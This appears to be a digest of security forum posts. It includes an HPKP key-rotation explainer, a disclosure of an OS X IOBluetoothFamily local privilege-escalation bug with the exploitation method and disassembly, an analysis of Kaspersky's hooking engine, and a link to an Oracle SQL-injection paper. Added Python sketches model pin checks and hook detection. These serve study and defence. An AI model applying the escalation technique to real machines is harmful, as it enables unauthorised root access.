Good advice is to keep this backup key pair (especially the private key) in a safe place until you need it. Uploading it to the server is dangerous: when your server is compromised you lose both keys at once and have no backup key left. Generate a pin for the backup key exactly as you did for the current key and include both pin-sha256 values as shown above in the HPKP header.

In case the current key is compromised make sure all vulnerabilities are patched and then remove the revoked pin. Generate a CSR for the backup key, let your CA issue a new certificate, and revoke the old one. Upload the new certificate to your server and you are done. Finally, do not forget to generate a new backup key and include that pin in your HPKP header again. Once a browser successfully establishes a TLS connection the next time, it will see your updated HPKP header and replace any stored pins with the new ones.

Sursa: https://timtaubert.de/blog/2014/10/http-public-key-pinning-explained/
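As an added illustration (not code from the original post) of how a pin-sha256 value is derived and checked, the Python below encodes a SubjectPublicKeyInfo for constructed toy RSA numbers, computes its pin, parses the header shown above, and walks the current/backup/forged-key scenario; a real deployment would take the SPKI from the certificate with openssl rather than encoding it by hand.

```python
"""HPKP pin derivation and validation, sketched with the standard library only.

Added example, not from the original post. The RSA numbers below are
constructed toy values; a real pin is computed over the SPKI that
`openssl x509 -pubkey -noout` prints for the deployed certificate.
"""
import base64
import hashlib

# DER-encoded OID 1.2.840.113549.1.1.1 (rsaEncryption)
RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")


def _der_len(n: int) -> bytes:
    """DER length field, short form below 0x80, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(content)) + content


def _der_int(value: int) -> bytes:
    """INTEGER; one extra byte is added whenever the top bit would be set."""
    body = value.to_bytes((value.bit_length() + 8) // 8, "big")
    return _der(0x02, body)


def rsa_spki_der(n: int, e: int) -> bytes:
    """SubjectPublicKeyInfo ::= SEQUENCE { AlgorithmIdentifier, BIT STRING }.

    HPKP hashes exactly this structure, never the certificate, which is why a
    pin stays valid across certificate renewals that reuse the key pair.
    """
    alg_id = _der(0x30, _der(0x06, RSA_ENCRYPTION_OID) + b"\x05\x00")  # OID + NULL
    rsa_pub = _der(0x30, _der_int(n) + _der_int(e))                   # RSAPublicKey
    bit_string = _der(0x03, b"\x00" + rsa_pub)                         # 0 unused bits
    return _der(0x30, alg_id + bit_string)


def pin_sha256(spki_der: bytes) -> str:
    """The pin-sha256 token: base64(SHA-256(SPKI DER))."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode("ascii")


def parse_hpkp_header(value: str) -> dict:
    """Split a Public-Key-Pins header value into its pins and directives."""
    pins, max_age, include_sub = [], None, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name, val = name.strip().lower(), val.strip().strip('"')
        if name == "pin-sha256":
            pins.append(val)
        elif name == "max-age":
            max_age = int(val)
        elif name == "includesubdomains":
            include_sub = True
    return {"pins": pins, "max_age": max_age, "include_subdomains": include_sub}


def pins_valid(chain_spkis: list, stored_pins: list) -> bool:
    """Pin validation as the post describes it: some SPKI fingerprint anywhere
    in the presented chain must match a stored pin. Expiry and revocation are
    separate checks that run afterwards; with no stored pins, fall through."""
    if not stored_pins:
        return True
    return any(pin_sha256(spki) in stored_pins for spki in chain_spkis)


def rotation_scenario() -> dict:
    """Constructed scenario: a site pins its current key and an unrelated
    backup key; after a compromise it serves a certificate for the backup key,
    while a forged certificate for an attacker's key must still fail."""
    current = rsa_spki_der(int("c4f1d2e3" * 16, 16), 65537)   # constructed modulus
    backup = rsa_spki_der(int("9a7b5c3d" * 16, 16), 65537)    # constructed modulus
    attacker = rsa_spki_der(int("deadbeef" * 16, 16), 65537)  # constructed modulus
    header = 'pin-sha256="%s"; pin-sha256="%s"; max-age=15768000; includeSubDomains' % (
        pin_sha256(current), pin_sha256(backup))
    stored = parse_hpkp_header(header)["pins"]
    return {
        "current_ok": pins_valid([current], stored),
        "backup_ok": pins_valid([backup], stored),
        "forged_ok": pins_valid([attacker], stored),
    }
```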
-
[h=3]Mac OS X local privilege escalation (IOBluetoothFamily)[/h]

(This post is a joint work with @joystick, see also his blog here)

Nowadays, exploitation of user-level vulnerabilities is becoming more and more difficult, because of the widespread diffusion of several protection methods, including ASLR, NX, various heap protections, stack canaries, and sandboxed execution. As a natural consequence, instead of extricating themselves with such a plethora of defensive methods, attackers prefer to take the “easy” way and started to move at the kernel-level, where sophisticated protection techniques are still not very common (indeed, things like KASLR and SMEP are implemented only in the latest versions of the most popular OSes). This trend is also confirmed by the rising number of kernel-level vulnerabilities reported in the last few months in Windows, Linux, and OS X.

Following this trend, we recently looked at few OS X drivers (“KEXT”s) and found an integer signedness bug affecting service IOBluetoothHCIController (implemented by the IOBluetoothFamily KEXT). This vulnerability can be exploited by a local attacker to gain root privileges. The issue is present on the latest versions of OS X Mavericks (tested on 10.9.4 and 10.9.5), but has been “silently” patched by Apple in OS X Yosemite.

[h=3]Vulnerability overview[/h]

In a nutshell, the bug lies in the IOBluetoothHCIUserClient::SimpleDispatchWL() function. The function eventually takes a user-supplied 32-bit signed integer value and uses it to index a global array of structures containing a function pointer. The chosen function pointer is finally called. As the reader can easily imagine, SimpleDispatchWL() fails at properly sanitizing the user-supplied index, thus bad things may happen if a malicious user is able to control the chosen function pointer.

More in detail, the vulnerable part of the function is summarized in the pseudocode below. At line 14, the user-supplied 32-bit integer is casted to a 64-bit value. Then, the "if" statement at line 16 returns an error if the casted (signed) value is greater than the number of methods available in the global _sRoutines array; obviously, due to the signed comparison, any negative value for the method_index variable will pass this test. At line 20 method_index is used to access the _sRoutines array, and the retrieved callback is finally called at line 23.

 1  typedef struct {
 2      void (*function_pointer)();
 3      uint64 num_arguments;
 4  } BluetoothMethod;
 5
 6  BluetoothMethod _sRoutines[] = { ... };
 7
 8  uint64 _sRoutineCount = sizeof(_sRoutines)/sizeof(BluetoothMethod);
 9
10  IOReturn IOBluetoothHCIUserClient::SimpleDispatchWL(IOBluetoothHCIDispatchParams *params) {
11
12      // Here "user_param" is a signed 32-bit integer parameter
13
14      int64 method_index = (int64) user_param;
15
16      if (method_index >= _sRoutineCount) {
17          return kIOReturnUnsupported;
18      }
19
20      BluetoothMethod method = _sRoutines[method_index];
21      ...
22      if (method.num_arguments < 8) {
23          method.function_pointer(...);
24      }
25      ...
26  }

[h=3]Exploitation details[/h]

Exploitation of this vulnerability is just a matter of supplying the proper negative integer value in order to make IOBluetoothFamily index the global _sRoutines structure out of its bounds, and to fetch an attacker-controlled structure. The supplied value must be negative to index outside the _sRoutines structure while still satisfying the check at line 16.

As a foreword, consider that for our "proof-of-concept" we disabled both SMEP/SMAP and KASLR, so some additional voodoo tricks are required to get a fully weaponized exploit. Thus, our approach was actually very simple: we computed a value for the user-supplied parameter that allowed us to index a BluetoothMethod structure such that BluetoothMethod.function_ptr is a valid user-space address (where we placed our shellcode), while BluetoothMethod.num_arguments is an integer value less than 8 (to satisfy the check performed by SimpleDispatchWL() at line 22).

As shown in the C code fragment above, the user-supplied 32-bit value (user_param) is first casted to a 64-bit signed value, and then used as an index in _sRoutines. Each entry of the global _sRoutines array is 16-byte wide (two 8-byte values). These operations are implemented by the following assembly code:

; r12+70h points to the user-supplied index value
mov     ecx, [r12+70h]
mov     r13d, kIOReturnUnsupported
lea     rdx, _sRoutineCount
cmp     ecx, [rdx]
jge     fail
; Go on and fetch _sRoutine[method_index]
...
movsxd  rax, ecx            ; Sign extension to 64-bit value
shl     rax, 4              ; method_index *= sizeof(BluetoothMethod)
lea     rdx, _sRoutines
mov     esi, [rdx+rax+8]    ; esi = _sRoutines[method_index].num_arguments
cmp     esi, 7              ; Check method.num_arguments < 8
ja      loc_289BA
...

At a higher-level, the address of the BluetoothMethod structure fetched when processing an index value "user_param" is computed by the following formula:

struct_addr = (ext(user_param & 0xffffffff) * 16) + _sRoutine

Where ext() is the sign-extension operation (implemented by the movsxd instruction in the assembly code snippet above). By solving this formula for user_param and searching inside the kernel address space, we found several candidate addresses that matched our criteria (i.e., a valid user-space pointer followed by an integer value < 8). The rest of the exploit is just a matter of mmap()'ing the shellcode at the proper user-space address, connecting to the IOBluetoothHCIController service and invoking the vulnerable method.

The source code for a (very rough) proof-of-concept implementation of the aforementioned exploit is available here, while the following figure shows the exploit "in action".

[Figure: Execution of our "proof-of-concept" exploit]

[h=3]Patching[/h]

We verified the security issue both on OS X Mavericks 10.9.4 and 10.9.5 (MD5 hash values for the IOBluetoothFamily KEXT bundle on these two OS versions are 2a55b7dac51e3b546455113505b25e75 and b7411f9d80bfeab47f3eaff3c36e128f, respectively). After the release of OS X Yosemite (10.10), we noticed the vulnerability has been silently patched by Apple, with no mention about it in the security change log.

A side-by-side comparison between versions 10.9.x and 10.10 of IOBluetoothFamily confirms Apple has patched the device driver by rejecting negative values for the user-supplied index. In the figure below, the user-supplied index value is compared against _sRoutineCount (orange basic block). Yosemite adds an additional check to ensure the (signed) index value is non-negative (green basic block, on the right).

[Figure: Comparison of the vulnerable OS X driver (Mavericks, on the left) and patched version (Yosemite, on the right)]

[h=3]Conclusions[/h]

We contacted Apple on October 20th, 2014, asking for their intention to back-port the security fix to OS X Mavericks. Unfortunately, we got no reply, so we decided to publicly disclose the details of this vulnerability: Yosemite has now been released for a while and is available for free for Apple customers; thus, we don’t think the public disclosure of this bug could endanger end-users.

Sursa: Roberto Paleari's blog: Mac OS X local privilege escalation (IOBluetoothFamily)
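To make the signedness issue concrete, here is an added Python model (not the authors' PoC) of the two checks: the signed comparison against _sRoutineCount as in Mavericks, and the extra non-negative check Yosemite added, together with the address formula quoted above. _sRoutineCount and the _sRoutines base address are constructed placeholders, not real kernel values.

```python
"""Why `if (method_index >= _sRoutineCount)` is not a bounds check.

Added example, not the PoC from the post. It models the instructions the
post disassembles: `cmp ecx, [rdx]` / `jge` (a signed compare against
_sRoutineCount) and `movsxd rax, ecx` / `shl rax, 4` (sign extension, then
times sizeof(BluetoothMethod)), and contrasts the Mavericks check with the
patched Yosemite one. The table size and base address are placeholders.
"""
from typing import Optional

ENTRY_SIZE = 16                         # sizeof(BluetoothMethod): pointer + uint64
SROUTINE_COUNT = 0x10                   # constructed placeholder for _sRoutineCount
SROUTINES_BASE = 0xFFFFFF8000A00000     # constructed placeholder for &_sRoutines
MASK64 = (1 << 64) - 1


def to_int32(value: int) -> int:
    """Read the low 32 bits of value as a signed int (what ecx holds)."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def sign_extend_64(value32: int) -> int:
    """ext(): movsxd rax, ecx -- the 32-bit value becomes a signed 64-bit one,
    so 0xFFFFFFFF turns into -1 rather than 4294967295."""
    return to_int32(value32)


def mavericks_check(user_param: int) -> bool:
    """Vulnerable check: passes whenever method_index < _sRoutineCount.
    The comparison is signed, so every negative index is accepted."""
    method_index = sign_extend_64(user_param)
    return method_index < SROUTINE_COUNT


def yosemite_check(user_param: int) -> bool:
    """Patched check: the index must also be non-negative."""
    method_index = sign_extend_64(user_param)
    return 0 <= method_index < SROUTINE_COUNT


def struct_addr(user_param: int) -> int:
    """struct_addr = (ext(user_param & 0xffffffff) * 16) + _sRoutine,
    evaluated with 64-bit wraparound the way the CPU does it."""
    index = sign_extend_64(user_param & 0xFFFFFFFF)
    return (index * ENTRY_SIZE + SROUTINES_BASE) & MASK64


def dispatch(user_param: int, patched: bool) -> Optional[int]:
    """Address the driver would read the BluetoothMethod from, or None when
    the request is rejected with kIOReturnUnsupported."""
    accepted = yosemite_check(user_param) if patched else mavericks_check(user_param)
    return struct_addr(user_param) if accepted else None


if __name__ == "__main__":
    for param in (3, 0x10, 0xFFFFFFFF, 0x80000000):
        print(hex(param), dispatch(param, patched=False), dispatch(param, patched=True))
```

With the vulnerable check, 0xFFFFFFFF (index -1) resolves to one entry below the table and 0x80000000 to 2^35 bytes below it; the patched check returns None for both.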
-
Kaspersky Hooking Engine Analysis October 27, 2014 By Andrea Sindoni Leave a Comment In this article we will talk about a few hooking techniques used by antivirus software. For the purpose of this analysis the antivirus chosen will be Kaspersky (Antivirus in prova: scarica le versioni trial | Kaspersky Lab IT PURE 3.0 Total Security), we will deal with various hooking techniques used both at user and kernel mode. The reference operating system will be Windows 7 Professional 32-bit. The image below shows a summary of the techniques we will analyze in this article. In order we will deal with: User-space Processes Inline hooking IAT and EAT Virtual Address Descriptor Hidden registry entry IDT SSDT MINI-FILTER IRP TDI HOOKING CALLBACKS Conclusion User-space Processes We start with a brief introduction by looking at the processes of kaspersky in user-space. The main userspace process is “avp.exe” which is instantiated twice: one instance runs under the privileges of NT AUTHORITY\SYSTEM the other is used for the user interface (avp.exe user). The other process: ProtectedObjectsSrv.exe acts as encryption service. We will focus on the last one: it runs as a background Windows service called “CSObjectsSrv” (CryptoStorage control service). InfoWatch CryptoStorage is intended for centralized protection of confidential data using cryptographic methods during data storage and processing. The product is based on the integrative approach to data protection. The functional capabilities include file and folder encryption using resilient encryption algorithms, an option to create special data storage objects – the container files, logical disks and flash drives and differentiation of access rights to the protected objects. InfoWatch CryptoStorage protects against unauthorised access to the RAM content dumped to the hard disk in case of hibernation, crash dumps or data coming from temporary files and swap files. 
More information about this topic can be found at InfoWatch - information security software products and solutions Let’s now look at all the hooking methods starting from the userland. Inline hooking To find API hooks in User-mode, we can use use the apihooks plugin of Volatility The processes involved in the inline hooking are: svchost.exe avp.exe[pid1] NT Authority\SYSTEM avp.exe[pid2] avp.exe one is for the protection service (avp.exe system), the other one, as already said, is for the user interface (avp.exe user). The service requires full system access, that’s why it runs as System. Let’s examine svchost.exe, this process is subject to inline hooking, in fact, at address 0x7453b5dd we can find a jump that leads to wfapigp.dll, which resides at location 0x74586218. Using Volatility we can dump the process with pid 1560 and using IDA we can quickly disassemble the dump and double check for the presence of the hook at location 0x7453b5dd. Scrolling again the report generated by Volatility, we can see that the process avp.exe uses different modules (image below) The process avp.exe makes use of different hooking techniques??, let’s try and investigate the following module: ushata.dll In this case the hooking occurs inside ntdll.dll, the function hooked is ZwProtectVirtualMemory, which is located at 0x77015f18, checking with IDA we can confirm the presence of a jump at 0x71722066, which is the location in which the hooking module ushata.dll is loaded. In here we can see how avp.exe loads ushdata.dll using a standard LoadLibraryEx() In this context, can occur something similar to what is described in the following code, basically: [TABLE] [TR] [TD=class: code]hDLL = LoadLibraryExW(L"USHATA.DLL", null, 8); lpGetNumber = (LPGETNUMBER)GetProcAddress((HMODULE)hDLL, "InitHooks"); [/TD] [/TR] [/TABLE] Let’s see what are the methods exported by the module ushdata.dll: So the exported functions of ushdata.dll module are InitHooks, SetClientVerdict and SetShuttingDownHint. 
In general from the report generated by volatility, the modules and functions that are subject to inline hooking, are: C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\SYSTEM32\ntdll.dll (FUNCTIONS ntdll.dll!NtProtectVirtualMemory e ntdll.dll!ZwProtectVirtualMemory) C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] ntdll.dll!NtProtectVirtualMemory JMP 70B12066 C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\ushata.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\system32\kernel32.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\system32\ole32.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] USER32.dll!NotifyWinEvent + 6AE The undocumented used is NtProtectVirtualMemory, which will allows to set the page protection and returns the old protection (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html). IAT and EAT Continuing the analysis of the hooking in User-space, we can still make use of Volatility to detect the hooking performed on both the IAT and EAT. We will find only two functions: one for the IAT hooking and another one for EAT hooking. Referring to the image at the top (EAT Hook), we conclude that the affected module is kernel32.dll, specifically the CreateThread function, as shown in the figure below: Virtual Address Descriptor We can open a brief parenthesis on the kernel data structure that takes care of registering the use of virtual addresses in a process, it is called Process VAD (Virtual Address Descriptor). For each process the memory manager maintains a set of VADs, which contain information on the address space of the process itself. Reconstructing the VAD tree allows for the reconstruction of the process with all of its mapped files. 
Here’s an example: The protection field highlighted in red is extracted from the flProtect parameter passed as input to the VirtualAlloc API (VirtualAlloc function (Windows)). You can also use the windbg command !vad to display the VADs of a given process: [TABLE] [TR] [TD=class: code]kd> !process 0 1 avp.exe kd> !vad [address of VadRoot] [/TD] [/TR] [/TABLE] Hidden registry entry A hive is a database of registry values ??divided in logical groups of keys and subkeys; the values ??in the registry, in turn, have a number of supporting files containing backups of their data. These files are located mainly in the %SystemRoot% \System32\Config and are created/updated each time the user logs in. Here is a table showing the standard hive with the respective files (Registry Hives (Windows)): [TABLE] [TR] [TD]Registry hive[/TD] [TD]Supporting files[/TD] [/TR] [TR] [TD]HKEY_CURRENT_CONFIG[/TD] [TD]System, System.alt, System.log, System.sav[/TD] [/TR] [TR] [TD]HKEY_CURRENT_USER[/TD] [TD]Ntuser.dat, Ntuser.dat.log[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\SAM[/TD] [TD]Sam, Sam.log, Sam.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\Security[/TD] [TD]Security, Security.log, Security.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\Software[/TD] [TD]Software, Software.log, Software.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\System[/TD] [TD]System, System.alt, System.log, System.sav[/TD] [/TR] [TR] [TD]HKEY_USERS\.DEFAULT[/TD] [TD]Default, Default.log, Default.sav[/TD] [/TR] [/TABLE] Let’s look for hidden registry values related to the driver klif.sys and let’s start with the help command !reg: !reg hivelist It displays a list of all hives in the system, then we select the Hive Address of SYSTEM using the following command: !reg openkeys “Hive Address of SYSTEM” It displays all open keys in a hive: I also used the above the command: !reg cellIndex “HiveAddress of SYSTEM” “Index” It displays the virtual address for a cell in a hive, Index specifies the cell index. 
Using the command: !reg valuelist “HiveAddress of SYSTEM” KeyNodeAddress we can show a list of the values in the specified key node, KeyNodeAddress specifies the address of the key node. Then we show the registry key value structure !reg kvalue Address Address specifies the address of the value, finally, we can reuse the cell index with the new index of the cell and dc command (it displays double word values, 4 bytes, and ASCII characters) We can achieve the same result using Volatility, let’s briefly show how to do that using the command hivelist: And once again we come across the KLIF service: Let’s now move to the analysis of the hooking at kernel space, in particular we will deal with: IDT, SSDT and IRP hooking. IDT System calls are used to traverse the barrier that exists between user space and kernel space, for this task the IDT is used, the IDT is the table that implements the interrupt vector table, in turn used to dispatch the interrupts. The IDT is composed, internally, of a data structure of 8 bytes entries, which describes how the interrupt must be managed (x86 CPU). In the picture below you can see the relationship between IDT and the instruction “int 2e” that is normally used to initiate a system call, even though on recent CPUs the SYSENTER instruction is used a replacement. The goal of IDT hooking is to hook any function already registered for a given interrupt. Let’s see if the software in question uses these techniques, so we can analyze it with windbg and the command !idt Now let’s run the same check with volatility,using the command idt, we will see that the two results match: In the selected row we can see, from the column Value, that the address matches the one analyzed with windbg, also in the column Module we can notice the presence of ntoskrnl.exe, which shows that there are no hooks in place. SSDT The System Service Descriptor Table (SSDT) contains pointers to kernel mode functions provided by the kernel executable module (ntoskrnl.exe). 
There is a second SSDT called shadow SSDT table, that instead stores the native functions provided by the GUI module win32k.sys. It ‘important to make an observation: when a system call reaches ntdll.dll, EAX will contain the hexadecimal value corresponding to the index into the SSDT of the function to be called, and immediately after the command int 2E the control is transferred to KiSystemService: We’re going to check the contents of the two tables for the software in question, it is possible to analyze the memory with Volatility or WinDBG: From the figure on the left hand side we can see the memory belonging to klif.sys at address 0x8C836000. On the right hand side we have the output of the command: kd> dps KiServiceTable l11C that show the presence of SSDT hooks from the klif module. We can also investigate KeServiceDescriptorTable and KeServiceDescriptorTableShadow. The module klif.sys seems to be the one that deals with SSDT and SSDT Shadow hooking. Let’s look more closely at klif.sys, the first function we’re going to inspect is “PsSetLoadImageNotifyRoutine” that registers a driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory). In the image below we see a series of two calls, the first one calls ZwQuerySystemInformation and then the second one invokes KeServiceDescriptorTable, which is the classical sequence used to install an SSDT hook. SSDT hooking is not performed on 64-bits systems because the Kernel Patch Protection (KPP), also known as Patchguard, protects this structure. It is anyway possible to use a mini-filter driver as a workaround. MINI-FILTER And indeed that’s what we have, a minifilter driver: A mini-filter driver must specify an altitude value from an altitude range that represents a load order group. 
A minifilter driver’s altitude ensures that the instance of the minifilter driver is always loaded at the appropriate location related to other minifilter driver instances, and it determines the order in which the filter manager calls the minifilter driver to handle I/O. Altitudes are allocated and managed by Microsoft itself. The following figure shows a simplified I/O stack with the filter manager and three minifilter drivers. I n our case we have [TABLE] [TR] [TD]Load order group[/TD] [TD]Altitude range[/TD] [TD]Description[/TD] [/TR] [TR] [TD]FSFilter Anti-Virus[/TD] [TD]320000-329999[/TD] [TD]This group includes filter drivers that detect and disinfect viruses during file I/O.[/TD] [/TR] [/TABLE] More information at http://msdn.microsoft.com/en-us/library/windows/hardware/ff549689%28v=vs.85%29.aspx IRP An IRP is an object used to communicate between all the different layers of a driver stack (Driver stacks (Windows Drivers)). For each driver, there are some major functions that receive IRPs to process. These major functions are kept inside a table of pointers. This driver contains the following functions: Driver Entry AddDevice Dispatch routine Unload() The Driver Object structure is presented as follows By default the I/O manager does point the DriverInit at the DriverEntry(). The array MajorFunction is essentially a table, each driver populates this table with function pointers, called Dispatch routine. The main data structures used by the kernel driver majors are the IRPs. Some of the most used are: IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, IRP_MJ_DEVICE_CONTROL. We can sniff the traffic IRP to the driver klif using Irp Tracker: From the red boxes we can see the two processes: avp.exe and svchost.exe calling the NtFsControlFile API (which sends a control code directly to the driver klif) TDI HOOKING The kernel module responsible for TDI HOOKING is kltdi.sys, we can look for it inside the structure LDR_DATA_TABLE_ENTRY, pointed by PsLoadedModuleList. 
By running the modules command in Volatility we will get: kltdi.sys 0x8cb7a000 0x9000 \SystemRoot\system32\DRIVERS\kltdi.sys At this point we can check to see if there is something unusual for the driver “tdx“: As we can see this is a list of devices that belongs to \Driver\tdx and in each device the module kltdi.sys is present, loaded at the address 0x8cb57000. Using Windbg we can check what happens at the location where tdx.sys is loaded: tdx.sys 0x8cb57000 0x17000 \SystemRoot\system32\DRIVERS\tdx.sys We only see the location of the major Function IRP_MJ_CREATE: DriverName: tdx DriverStart: 0x8cb57000 DriverSize: 0x17000 DriverStartIo: 0x0 0 IRP_MJ_CREATE 0x8cb62faa tdx.sys Let’s set a breakpoint at the address 0x8cb62faa, this is the location where the major function IRP_MJ_CREATE of the module tdx.sys. After then we can start a ping and the debugger will immediately break at the address we are expecting, thus confirming the existence of a TDI hook. We can see in the call stack the presence of the module kltdi.sys, let’s focus on the function kltdi+0x4803: The IoCallDriver routine sends an IRP to the driver associated with a specified device object, it accepts two input parameters DEVICE_OBJECT*an IRP* [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]NTSTATUS IoCallDriver( _In_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp ); [/TD] [/TR] [/TABLE] Quoting the Microsoft’s documentation: An IRP passed in a call to IoCallDriver becomes inaccessible to the higher-level driver, unless the higher-level driver has called IoSetCompletionRoutine to set up an IoCompletion routine for the IRP. If it has, the IRP input to the IoCompletion routine has its I/O status block set by the lower drivers, and all lower-level drivers’ I/O stack locations are filled with zeros. 
CALLBACKS

Now let's take a look at the kernel callbacks, once again with Volatility:

Thread creation (PsSetCreateThreadNotifyRoutine): klif.sys, kl1.sys
Shutdown callbacks (IoRegisterShutdownNotification): kl1.sys
KeRegisterBugCheckReasonCallback: kl1.sys

There are several addresses for the callbacks, but we want to point out the presence of the kernel module kl1.sys, so let's dig deeper: kl1.sys is a boot start driver; in the image below you can see the presence (in the DriverEntry routine) of the API IoRegisterBootDriverReinitialization.

The IoRegisterBootDriverReinitialization() function registers a callback routine that will be called whenever all boot drivers have been loaded. This routine is typically used in filters that attach to non-Plug-and-Play devices, and thus cannot rely on the AddDevice() function being called to be notified that a new device was created (check this example for more details: Let's Start Again « DriverEntry.com.br).

Now let's also look at the Driver Dispatch Routines:

As you can see, all Driver Dispatch Routines point to the same address, kl1+0x32f0.

Conclusion

The article was written for educational purposes; the analysis is not detailed and many things have been analysed very quickly. There is also still research to be done on the network part. A big thanks goes to Quequero.

Reference

http://www.reconstructer.org/papers/Hunting%20rootkits%20with%20Windbg.pdf
Malware Analysts Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

Source: https://quequero.org/2014/10/kaspersky-hooking-engine-analysis/
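As an added example (not part of the original post or of the quequero.org analysis), a small Python check that automates what the post does by hand with Volatility: it takes the module list and a driver's IRP major-function table and flags any handler whose address falls outside the owning driver's image, which is how a dispatch-table hook shows up. The module addresses reuse the ones quoted in the post; the IRP_MJ_DEVICE_CONTROL entry pointing into kltdi.sys is constructed here purely to show what a flagged line looks like and was not observed in the article.

```python
import re

# Constructed sample of Volatility "modules" output (addresses as quoted in the post).
MODULES = """\
kltdi.sys 0x8cb7a000 0x9000 \\SystemRoot\\system32\\DRIVERS\\kltdi.sys
tdx.sys 0x8cb57000 0x17000 \\SystemRoot\\system32\\DRIVERS\\tdx.sys
"""

# Constructed sample of Volatility "driverirp" output for tdx. The IRP_MJ_CREATE line
# matches the post; the IRP_MJ_DEVICE_CONTROL line is invented (kltdi+0x4803) to show
# what a handler redirected into another module would look like.
DRIVERIRP = """\
DriverName: tdx
DriverStart: 0x8cb57000
DriverSize: 0x17000
DriverStartIo: 0x0
   0 IRP_MJ_CREATE 0x8cb62faa tdx.sys
  14 IRP_MJ_DEVICE_CONTROL 0x8cb7e803 kltdi.sys
"""

IRP_RE = re.compile(r"^\s*\d+\s+(IRP_MJ_\w+)\s+(0x[0-9a-f]+)", re.I)


def parse_modules(text):
    """Return [(module_name, base, end)] from 'modules' output."""
    mods = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            base, size = int(parts[1], 16), int(parts[2], 16)
            mods.append((parts[0], base, base + size))
    return mods


def owner(addr, mods):
    """Name of the loaded module containing addr, or None if it lies outside all of them."""
    for name, lo, hi in mods:
        if lo <= addr < hi:
            return name
    return None


def find_hooked_irps(driverirp_text, mods):
    """Return (major_function, address, owning_module) for handlers not inside the driver's own image."""
    hooked, driver = [], None
    for line in driverirp_text.splitlines():
        if line.startswith("DriverName:"):
            driver = line.split(":", 1)[1].strip().lower()
        m = IRP_RE.match(line)
        if m and driver:
            addr = int(m.group(2), 16)
            mod = owner(addr, mods)
            if mod is None or not mod.lower().startswith(driver):
                hooked.append((m.group(1), addr, mod))
    return hooked
```

An in-range handler, like the real IRP_MJ_CREATE above, does not rule out interception: kltdi.sys reaches tdx through a device attached to tdx's device stack and calls IoCallDriver from there, which is why the post finds it in the call stack and the device list rather than in the dispatch table.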
-
Those of you who are coming, don't forget the "Fan Nytro" t-shirts!
-
Hacking Oracle from the Web

This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database. Most of the techniques available over the Internet are based on exploitation when the attacker has interactive access to the Oracle database, i.e. he can connect to the database via a SQL client. While some of these techniques can be directly applied when exploiting SQL injection in web applications, this is not always true. Unlike MS-SQL, Oracle neither supports nested queries, nor has any direct functionality like xp_cmdshell to allow execution of operating system commands. Extraction of sensitive data from a back-end database by exploiting SQL injection in Oracle web applications is well known. Performing privilege escalation and executing operating system commands from web applications is not widely known, and is the subject of this paper.

Download: http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf
